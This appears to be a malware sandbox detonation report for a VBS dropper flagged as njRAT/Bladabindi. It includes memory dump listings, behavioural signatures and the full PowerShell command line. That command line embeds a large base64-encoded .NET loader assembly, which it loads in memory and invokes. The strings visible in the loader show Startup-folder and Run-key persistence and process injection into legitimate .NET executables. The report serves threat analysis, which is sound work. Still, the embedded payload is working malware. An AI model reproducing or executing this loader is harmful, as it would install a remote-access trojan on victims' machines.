BH6ACoAQABAACgA+AD6ACgAAQMyAAARwCUrAJIhkyF9APAAHya2JQEDOgAAEbYlOgAjAB4mKgDPJSoANAABAy8AAANcAAAJLgB2AGIAcwAACyoALgB2AGIAcwAAc0MAOgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBzAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlAABxIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAAQwBvAHAAeQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAqAC4AdgBiAHMAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgAAFbUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AAAlQAGEAdABoAAAbVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAAAAQAdUwBwAGUAYwBpAGEAbABGAG8AbABkAGUAcgBzAAAPUwB0AGEAcgB0AHUAcAAAG3sAMAB9AF8AewAxADoATgB9AC4AbABuAGsAAB1DAHIAZQBhAHQAZQBTAGgAbwByAHQAYwB1AHQAABlJAGMAbwBuAEwAbwBjAGEAdABpAG8AbgAAG24AbwB0AGUAcABhAGQALgBlAHgAZQAsADAAABVUAGEAcgBnAGUAdABQAGEAdABoAAAjVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAAAJdgAxAC4AMAAAHXAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAAE0EAcgBnAHUAbQBlAG4AdABzAACAmS0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAB7ADAAfQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA1ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAewAxAH0AASFXAG8AcgBrAGkAbgBnAEQAaQByAGUAYwB0AG8AcgB5AAAXRABlAHMAYwByAGkAcAB0AGkAbwBuAAATTQBpAGMAcgBvAHMAbwBmAHQAABdXAGkAbgBkAG8AdwBTAHQAeQBsAGUAAAlTAGEAdgBlAAARawBlAHIAbgBlAGwAMwAyAAAZUgBlAHMAdQBtAGUAVABoAHIAZQBhAGQAACtXAG8AdwA2ADQAUwBlAHQAVABoAHIAZQBhAGQAQwBvAG4AdABlAHgAdAAAIVMAZQB0AFQAaAByAGUAYQBkAEMAbwBuAHQAZQB4AHQAACtXAG8AdwA2ADQARwBlAHQAVABoAHIAZQBhAGQAQwBvAG4AdABlAHgAdAAAIUcAZQB0AFQAaAByAGUAYQBkAEMAbwBuAHQAZQB4AHQAAB1WAGkAcgB0AHUAYQBsAEEAbABsAG8AYwBFAHgAACVXAHIAaQB0AGUAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAAI1IAZQBhAGQAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAAC24AdABkAGwAbAAAKVoAdwBVAG4AbQBhAHAAVgBpAGUAdwBPAGYAUwBlAGMAdABpAG8AbgAAHUMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAQQAAW0MAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsAXAB2ADQALgAwAC4AMwAwADMAMQA5AAAbQQBwAHAATABhAHUAbgBjAGgALgBlAHgAZQAALWEAcwBwAG4AZQB0AF8AcgBlAGcAYgByAG8AdwBzAGUAcgBzAC4AZQB4AGUAABVjAHYAdAByAGUAcwAuAGUAeABlAAATaQBsAGEAcwBtAC4AZQB4AGUAAA9qAHMAYwAuAGUAeABlAAAXTQBTAEIAdQBpAGwAZAAuAGUAeABlAAAVUgBlAGcAQQBzAG0ALgBlAHgAZQAAF1IAZQBnAFMAdgBjAHMALgBlAHgAZQAAg60rPgsi2UOUZGj9z8emTwADIAABBSABARERBhUSLAESDAYVEiwBEggGFRIsARIZBhUSLAESKAQgABMABAABHBwEIAECHAMgAAgGAAESKREtAyAADgIeAAUQAQAeAAYVEjUBEwAGFRIsARMABwYVEjUBEwACEwAFI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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAADAAAAEQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.zjn4*●*☞#:▶sr∞*▲◀(fom4*●*☞#:▶w∞*▲◀(n4*●*☞#:▶47.05.3](∞ú((úø(@@*ú.](∞ú(94*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))
Network
Files
memory/2836-57-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp
memory/2836-58-0x0000000002630000-0x00000000026B0000-memory.dmp
memory/2836-60-0x000000001B3A0000-0x000000001B682000-memory.dmp
memory/2836-59-0x0000000002630000-0x00000000026B0000-memory.dmp
memory/2836-61-0x0000000002290000-0x0000000002298000-memory.dmp
memory/2836-63-0x0000000002630000-0x00000000026B0000-memory.dmp
memory/2836-62-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp
memory/2836-64-0x0000000002630000-0x00000000026B0000-memory.dmp
memory/2836-65-0x00000000027B0000-0x00000000027BA000-memory.dmp
memory/2836-66-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-08-17 10:02
Reported
2023-08-17 10:04
Platform
win10v2004-20230703-en
Max time kernel
146s
Max time network
149s
Command Line
Signatures
njRAT/Bladabindi
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3192 set thread context of 4548 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LaCasa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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AKUAAADjAAAABgEAADglAQAAEQwUcuMCAHAXjQUAAAElFnL9AgBwohQUKEkAAAoXK74RDBRyGQMAcBeNBQAAASUWHyUoKAAACnIvAwBwclMDAHByXQMAcChKAAAKohQUKEkAAAoYK4gRDBRyewMAcBeNBQAAASUWco8DAHARDBRyGQMAcBaNBQAAARQUFChCAAAKKAwAAAoRCChLAAAKKEUAAAqiFBQoSQAAChk4Pv///xEMFHIqBABwF40FAAABJRYRDBRyGQMAcBaNBQAAARQUFChCAAAKKEMAAAooTAAACqIUFChJAAAKGjgA////EQwUckwEAHAXjQUAAAElFnJkBABwohQUKEkAAAobON3+//8RDBRyeAQAcBeNBQAAASUWFowJAAABohQUKEkAAAocOLn+//8RDBRykAQAcBaNBQAAARQUFBcoTQAACibeDyUoQAAAChMRKEEAAAreAN4SEQwsDREMKAwAAAooTgAACibcByg7AAAKKBUAAAYfDDjA+v//KwsHKDsAAAooFQAABt4PJShAAAAKExIoQQAACt4AKgAAAEFkAAAAAAAA0QIAABgAAADpAgAADwAAABYAAAEAAAAAUgMAAMcBAAAZBQAADwAAABYAAAECAAAAUgMAANgBAAAqBQAAEgAAAAAAAAAAAAAAAAAAAF0FAABdBQAADwAAABYAAAETMAIAyQAAAAAAAABymgQAcHKsBABwKAQAACuACAAABHKaBABwcsYEAHAoBQAAK4AJAAAEcpoEAHBy8gQAcCgGAAArgAoAAARymgQAcHIUBQBwKAcAACuACwAABHKaBABwckAFAHAoCAAAK4AMAAAEcpoEAHByYgUAcCgJAAArgA0AAARymgQAcHKABQBwKAoAACuADgAABHKaBABwcqYFAHAoCwAAK4APAAAEcsoFAHBy1gUAcCgMAAArgBAAAARymgQAcHIABgBwKA0AACuAEQAABCqODwAoEgAABg8BKBMAAAbQBQAAGygPAAAKKE8AAAooDgAAKyoAAAAbMAsAwgQAAAIAABFyHgYAcAoWKwEWRQgAAAAFAAAATwAAAGMAAABzAAAAhAAAAJAAAACeAAAArAAAADiFBAAAHo0cAAABJRZyegYAcKIlF3KWBgBwoiUYcsQGAHCiJRly2gYAcKIlGnLuBgBwoiUbcv4GAHCiJRxyFgcA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